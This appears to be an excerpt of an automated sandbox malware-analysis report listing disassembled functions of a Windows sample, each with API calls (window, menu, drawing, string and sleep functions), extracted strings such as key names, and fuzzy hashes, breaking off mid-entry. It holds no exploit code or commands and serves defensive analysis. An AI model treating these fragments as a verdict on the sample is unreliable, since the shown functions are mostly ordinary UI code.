                                                                                                      • Opcode ID: f083dd36fd4843e73545bef3ac754eee862c65c59d78a6c0f27d2ccc5995e0e1
                                                                                                      • Instruction ID: 35801c7235d8a2dd0ece6648e2e2ba96ceee973de5bab6bec452cf5ab84fa8a9
                                                                                                      • Opcode Fuzzy Hash: f083dd36fd4843e73545bef3ac754eee862c65c59d78a6c0f27d2ccc5995e0e1
                                                                                                      • Instruction Fuzzy Hash: 5251AE31A00615ABDB14EBA5DC89FAEB7B9AF44704F50442AF015E72D1DBB8AD40CB58
                                                                                                      Function 00432160 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 105windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • CreateWindowExW.USER32(?,ToolbarWindow32,00000000,?,00000000,00000000,000000B4,00000014,?,00000000,00000000), ref: 0043218B
                                                                                                      • GetStockObject.GDI32(00000011), ref: 0043219E
                                                                                                      • GetObjectW.GDI32(00000000,0000005C,?), ref: 004321BC
                                                                                                      • CreateFontIndirectW.GDI32(?), ref: 004321D1
                                                                                                      • SendMessageW.USER32(00000000,00000030,?,00000000), ref: 004321E7
                                                                                                      • SendMessageW.USER32(00000000,0000041E,00000014,00000000), ref: 004321F2
                                                                                                      • SendMessageW.USER32(00000000,00000420,00000000,00100000), ref: 00432200
                                                                                                      • GetDlgItem.USER32(?,?), ref: 0043220D
                                                                                                      • ShowWindow.USER32(?,00000000), ref: 00432225
                                                                                                      • GetWindowRect.USER32(?,?), ref: 00432232
                                                                                                      • ScreenToClient.USER32(?,?), ref: 00432245
                                                                                                      • ScreenToClient.USER32(?,?), ref: 0043224E
                                                                                                      • SetWindowPos.USER32(00000000,00000000,?,?,?,00000018,00000000), ref: 00432262
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$MessageSend$ClientCreateObjectScreen$FontIndirectItemRectShowStock
                                                                                                      • String ID: ToolbarWindow32
                                                                                                      • API String ID: 1801995013-4104838417
                                                                                                      • Opcode ID: 75dccdb2353e919780bed2b11c83ca037eab2203106cc7818d96142dd42cfe0a
                                                                                                      • Instruction ID: cc59631b687ed46b3897f8ef20cc18819bfc4e5e2055f90e08ac7289b8131753
                                                                                                      • Opcode Fuzzy Hash: 75dccdb2353e919780bed2b11c83ca037eab2203106cc7818d96142dd42cfe0a
                                                                                                      • Instruction Fuzzy Hash: E83129B690025DBFEB019FA4EC85EEF7BBDFB48749F004025FA00A61A1D3719D149BA5
                                                                                                      Function 0042577F Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 133stringwindowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • __EH_prolog.LIBCMT ref: 00425784
                                                                                                      • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004257B6
                                                                                                      • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004257C3
                                                                                                      • SendMessageW.USER32(?,00000148,00000000,?), ref: 004257D5
                                                                                                      • GetWindowTextW.USER32(?,00001000,?), ref: 004257FB
                                                                                                      • GetDlgItemTextW.USER32(?,000003EC,?,00000100), ref: 00425815
                                                                                                      • lstrlenW.KERNEL32(?,?,?,00000000,00429056,?,?,?,0041F4CA,?,?), ref: 00425828
                                                                                                      • lstrlenW.KERNEL32(: 4000,00000000,?,?,00000000,00429056,?,?,?,0041F4CA,?,?), ref: 00425853
                                                                                                      • MessageBoxW.USER32(00000000,?,00000000,00000030), ref: 00425866
                                                                                                      • lstrlenW.KERNEL32(???Text,004442A4,004547B4,00445324,004547B4,?,?,?,00000000,00429056,?,?,?,0041F4CA,?,?), ref: 004258C8
                                                                                                      • lstrcpynW.KERNEL32(?,?,00001000,004442A4,004547B4,00445324,004547B4,?,?,?,00000000,00429056,?,?,?,0041F4CA), ref: 004258E4
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Message$Sendlstrlen$Text$H_prologItemWindowlstrcpyn
                                                                                                      • String ID: : 4000$???Text
                                                                                                      • API String ID: 3656022795-756309069
                                                                                                      • Opcode ID: e13f2101a1895f75aa3d371a6b5d32a8db1136eb12e43ca482004f8cb91f2fb8
                                                                                                      • Instruction ID: 01f08ad20c749064f8174b4652a88f9b2be2e843cd0fc23914ea370b5b768190
                                                                                                      • Opcode Fuzzy Hash: e13f2101a1895f75aa3d371a6b5d32a8db1136eb12e43ca482004f8cb91f2fb8
                                                                                                      • Instruction Fuzzy Hash: 6641C071A00629ABDB14EBA4DC8AABFB778FF84304F10406EB405B71D1DB785E45CB58
                                                                                                      Function 00426687 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 77COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: H_prolog
                                                                                                      • String ID: %09$%0A$%0D$%20$%22$%23$%24$%26$%27$%3D$%3F$%5C
                                                                                                      • API String ID: 3519838083-2446051921
                                                                                                      • Opcode ID: 3cf61003effe16143afe819eb295b1fd836ee4a725ffab022525204fb86376a2
                                                                                                      • Instruction ID: e4395ca065afef6ac372c2a33fcf3eedde20844f49b3087595d7ffe9794c31db
                                                                                                      • Opcode Fuzzy Hash: 3cf61003effe16143afe819eb295b1fd836ee4a725ffab022525204fb86376a2
                                                                                                      • Instruction Fuzzy Hash: 0D21DE30691655B6DB05FF51CCA7FFE7B34AB1071AFA0442BB4193A0D39ABC6A08864C
                                                                                                      Function 0042A30D Relevance: 21.1, APIs: 2, Strings: 10, Instructions: 53stringCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • lstrcatW.KERNEL32(?,R-Mouse), ref: 0042A381
                                                                                                      • lstrcatW.KERNEL32(?,L-Win), ref: 0042A395
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: lstrcat
                                                                                                      • String ID: Alt$Alt-Gr$Ctrl$Ctrl-Alt$L-Mouse$L-Win$M-Mouse$R-Ctrl$R-Mouse$R-Win
                                                                                                      • API String ID: 4038537762-684211483
                                                                                                      • Opcode ID: 0196e6e6f9712b71f51dbd6c5d103967daff606a101654226cc2a381356c9e14
                                                                                                      • Instruction ID: a020f727c1a1fbe9591c624d4daefe5a6311d8d08f741b389f1f89b872b333bc
                                                                                                      • Opcode Fuzzy Hash: 0196e6e6f9712b71f51dbd6c5d103967daff606a101654226cc2a381356c9e14
                                                                                                      • Instruction Fuzzy Hash: 2101D432FC4A30F74E30A4487C51BBA6A401326B22BF14163FD5ABA5A6419D0CB5598F
                                                                                                      Function 00430481 Relevance: 19.6, APIs: 13, Instructions: 112COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • __EH_prolog.LIBCMT ref: 00430486
                                                                                                      • OffsetRect.USER32(?,?,?), ref: 004304D0
                                                                                                      • OffsetRect.USER32(00000001,00000001,00000001), ref: 004304EB
                                                                                                      • GetSysColor.USER32(00000014), ref: 004304F9
                                                                                                      • GetSysColor.USER32(00000010), ref: 00430521
                                                                                                      • CreatePen.GDI32(00000000,00000000,00000000), ref: 00430526
                                                                                                      • DeleteObject.GDI32(00000000), ref: 00430548
                                                                                                      • DeleteObject.GDI32(?), ref: 00430552
                                                                                                      • CreatePen.GDI32(00000000,00000000,00000000), ref: 00430506
                                                                                                        • Part of subcall function 00431AAD: SelectObject.GDI32(0043058E,75A8A5C0), ref: 00431ABA
                                                                                                        • Part of subcall function 00431AAD: MoveToEx.GDI32(0043058E,0043058E,1015FF56,00000000), ref: 00431AD6
                                                                                                        • Part of subcall function 00431AAD: LineTo.GDI32(0043058E,8B0043C1,5E5FF44D), ref: 00431AE5
                                                                                                        • Part of subcall function 00431AAD: MoveToEx.GDI32(0043058E,00000001,1015FF56,00000000), ref: 00431AF1
                                                                                                        • Part of subcall function 00431AAD: LineTo.GDI32(0043058E,8B0043C2,5E5FF44D), ref: 00431AFC
                                                                                                        • Part of subcall function 00431AAD: MoveToEx.GDI32(0043058E,0043058E,5E5FF44C,00000000), ref: 00431B08
                                                                                                        • Part of subcall function 00431AAD: LineTo.GDI32(0043058E,8B0043C1,1015FF55), ref: 00431B13
                                                                                                        • Part of subcall function 00431AAD: MoveToEx.GDI32(0043058E,5E5FF44D,5E5FF44C,00000000), ref: 00431B21
                                                                                                        • Part of subcall function 00431AAD: LineTo.GDI32(0043058E,8B0043C2,1015FF55), ref: 00431B2E
                                                                                                        • Part of subcall function 00431AAD: SelectObject.GDI32(0043058E,75A8A5C0), ref: 00431B35
                                                                                                      • OffsetRect.USER32(00000006,00000001,00000001), ref: 00430562
                                                                                                      • GetSysColor.USER32(00000012), ref: 0043056A
                                                                                                      • CreatePen.GDI32(00000000,00000000,00000000), ref: 00430575
                                                                                                      • DeleteObject.GDI32(00000000), ref: 00430593
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Object$LineMove$ColorCreateDeleteOffsetRect$Select$H_prolog
                                                                                                      • String ID:
                                                                                                      • API String ID: 132611724-0
                                                                                                      • Opcode ID: 4dac57c128d30c173cf18df6dbb9a561f39fe6e4e4e042d287648ad19142c4ff
                                                                                                      • Instruction ID: 46e6b0f7213544dc18f5c4da83762ef9c03a1ef126acf789cfd90c33d762b217
                                                                                                      • Opcode Fuzzy Hash: 4dac57c128d30c173cf18df6dbb9a561f39fe6e4e4e042d287648ad19142c4ff
                                                                                                      • Instruction Fuzzy Hash: 80411AB1D00218AFDB11DFA5CC85BEEBBB9EF48314F00951AF915B7250C7B59A048FA5
                                                                                                      Function 0042D4F4 Relevance: 18.1, APIs: 12, Instructions: 87COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetClientRect.USER32(00000000,00000000), ref: 0042D511
                                                                                                      • DrawEdge.USER32(?,00000000,00000006,0000200B), ref: 0042D53A
                                                                                                      • FillRect.USER32(?,00000000,00000010), ref: 0042D549
                                                                                                      • DrawEdge.USER32(?,00000000,00000006,00002007), ref: 0042D56D
                                                                                                      • FillRect.USER32(?,00000000,00000010), ref: 0042D57A
                                                                                                      • GetSysColor.USER32(00000008), ref: 0042D582
                                                                                                      • SetTextColor.GDI32(?,00000000), ref: 0042D58A
                                                                                                      • SetBkMode.GDI32(?,00000001), ref: 0042D593
                                                                                                      • GetStockObject.GDI32(00000011), ref: 0042D59B
                                                                                                      • SelectObject.GDI32(?,00000000), ref: 0042D5A9
                                                                                                      • DrawTextW.USER32(?,?,000000FF,00000004,00008024), ref: 0042D5D0
                                                                                                      • SelectObject.GDI32(?,00000004), ref: 0042D5DA
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DrawObjectRect$ColorEdgeFillSelectText$ClientModeStock
                                                                                                      • String ID:
                                                                                                      • API String ID: 303100802-0
                                                                                                      • Opcode ID: be91fde70604ba309ba84b06fb5e41ceb87a93f3c22d6c4ac74820cc584e0c58
                                                                                                      • Instruction ID: d2e2adb73274232bb2aef0161fc503774a35fff9785f72c0be1fa87e41e1273c
                                                                                                      • Opcode Fuzzy Hash: be91fde70604ba309ba84b06fb5e41ceb87a93f3c22d6c4ac74820cc584e0c58
                                                                                                      • Instruction Fuzzy Hash: F2316B32900218BFEB018FA4DC88EFFBBB8FB08714F004529FA16E6190C771A945CB65
                                                                                                      Function 0043446E Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 217sleepstringCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • __EH_prolog.LIBCMT ref: 00434473
                                                                                                      • lstrlenW.KERNEL32(00000002,00000000,00454458,00000000,00456170,?,00480744,00000000,00456170), ref: 004344CF
                                                                                                      • Sleep.KERNEL32(00000001,00456170,00454458,00000000,00456170,?,00480744,00000000,00456170), ref: 004344FB
                                                                                                      • lstrlenW.KERNEL32(00000000,00000000,00454458,00000000,00456170,?,00480744,00000000,00456170), ref: 004345EB
                                                                                                      • Sleep.KERNEL32(00000001,?,?,00480744,00000000,00456170), ref: 004346A5
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Sleeplstrlen$H_prolog
                                                                                                      • String ID: Error$Txt2Key'$Txt2Key Errormax len = 1024$XDE$paE
                                                                                                      • API String ID: 1132587711-4249972767
                                                                                                      • Opcode ID: c3832371cd4e9399f975608c8050f313c486b818965e6ed599acd880412cb46f
                                                                                                      • Instruction ID: 379ced037ab46fb24a61034532956adcdcc11928cb8dc0d2a7a9b49d20772f35
                                                                                                      • Opcode Fuzzy Hash: c3832371cd4e9399f975608c8050f313c486b818965e6ed599acd880412cb46f
                                                                                                      • Instruction Fuzzy Hash: B5612871944205BAEB14EF55DC5BBFE3BA49F45324F20402FF5416B2C2DABC6E4086AE
                                                                                                      Function 004253AC Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • __EH_prolog.LIBCMT ref: 004253B1
                                                                                                        • Part of subcall function 004254DA: SendMessageW.USER32(?,00000419,?,00000000), ref: 004254F9
                                                                                                        • Part of subcall function 004254DA: SendMessageW.USER32(?,0000041D,00000000,?), ref: 00425506
                                                                                                        • Part of subcall function 004254DA: ClientToScreen.USER32(?), ref: 00425527
                                                                                                        • Part of subcall function 004254DA: SendMessageW.USER32(?,00000403,?,00000001), ref: 00425538
                                                                                                      • CreatePopupMenu.USER32 ref: 004253E2
                                                                                                      • CreatePopupMenu.USER32 ref: 004253E7
                                                                                                      • AppendMenuW.USER32(?,00000400,00000001,00000000), ref: 00425403
                                                                                                      • AppendMenuW.USER32(?,00000400,00000002,00000000), ref: 00425414
                                                                                                      • CheckMenuItem.USER32(?,00000002,00000008), ref: 00425422
                                                                                                        • Part of subcall function 00435EB1: GetCurrentThreadId.KERNEL32 ref: 00435EC8
                                                                                                        • Part of subcall function 00435EB1: SetWindowsHookExW.USER32(000000FF,0043607A,00000000,00000000), ref: 00435ED9
                                                                                                        • Part of subcall function 00435EB1: TrackPopupMenuEx.USER32(00000001,?,?,?,?,00000000), ref: 00435EFB
                                                                                                        • Part of subcall function 00435EB1: UnhookWindowsHookEx.USER32(?), ref: 00435F17
                                                                                                      • SendMessageW.USER32(00001042,00000000,00000000), ref: 0042545E
                                                                                                      • SendMessageW.USER32(00001042,00000000,00000000), ref: 00425481
                                                                                                      • SendMessageW.USER32(?,00000403,00000000,00000000), ref: 004254B5
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
